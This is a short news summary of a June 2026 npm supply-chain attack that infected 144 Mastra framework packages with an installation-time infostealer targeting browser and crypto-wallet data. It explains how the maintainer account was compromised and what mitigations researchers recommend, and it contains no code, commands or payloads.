In a nutshell: 144 npm packages of the Mastra Framework have been infected with an infostealer that steals wallet and browser data during installation, already affecting the heavily-used core package.
An attacker has infected 144 npm packages of the open-source AI framework Mastra with malicious code, including the core package with over 918,000 weekly downloads. The malware steals wallet data and browser data already during installation.
Security companies JFrog, SafeDep, Socket and StepSecurity identified a supply chain attack codenamed “easy-day-js” on 17 June 2026. The attacker took over the account of former developer ehindero and published 144 manipulated packages in the Mastra namespace in a short time. Mastra is a JavaScript and TypeScript framework for developing AI applications. The affected packages themselves contain no direct malicious code, but instead link to the malicious dependency “easy-day-js”, which is disguised as a clone of a standard date library.
The infection is triggered during installation via an installation script. The script first disables TLS certificate validation and then downloads a second malware stage from an external IP address. The loader then deletes itself and leaves minimal forensic traces. The final malware functions as a cross-platform infostealer on Windows, macOS and Linux. It steals browser history and login credentials from more than 160 browser extensions for crypto wallets and transmits these to the attackers.
For CTOs, the scope of the attack is critical: the core package is downloaded over 918,000 times weekly. Systems are at risk immediately after installation, before developers actively integrate the package into code. The npm package manager has already removed the affected versions.
The compromised account ehindero had a personal token without source verification. Regular Mastra releases take place via automated processes with cryptographic signatures. Installations with enforced signature verification would have blocked the manipulated versions. Security researchers recommend affected developers to immediately switch to secure versions, change credentials and check systems for infection traces.
Source: www.it-daily.net · Published 18 June 2026
Lumi AI News — AI-assisted curation pursuant to Article 50 EU AI Act. Paraphrase and classification via Lumi News Pipeline v1.7.1.